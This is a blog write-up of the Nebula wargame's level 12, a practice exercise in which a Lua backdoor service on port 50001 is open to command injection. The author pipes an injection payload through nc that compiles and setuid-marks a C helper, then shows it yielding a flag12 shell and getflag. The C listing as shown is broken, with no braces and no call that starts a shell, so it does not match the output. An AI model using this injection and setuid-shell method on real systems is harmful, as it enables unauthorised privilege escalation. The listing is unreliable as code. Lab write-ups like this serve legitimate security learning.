Monday, September 3, 2012

nebula level12

Level details:
There is a backdoor process listening on port 50001.
Source code:
This one is super easy. It's a service written in lua that asks you for a password. The password's SHA-1 hash is generated and compared against a hardcoded hash. This is misleading, because the real problem resides in the hash function itself. The password variable is put in the command that generates the SHA-1 hash as is. Thus this is a simple command injection vulnerability.
level12@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
    int euid = geteuid();

    setresuid(euid, euid, euid);
    return 0;
level12@nebula:~$ echo '; cc -o /tmp/flag12_sh /tmp/shell.c; chmod +s /tmp/flag12_sh; echo' | nc localhost 50001
Password: Better luck next time
level12@nebula:~$ /tmp/flag12_sh
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Still worth a flag though.

~ Dmitry

No comments:

Post a Comment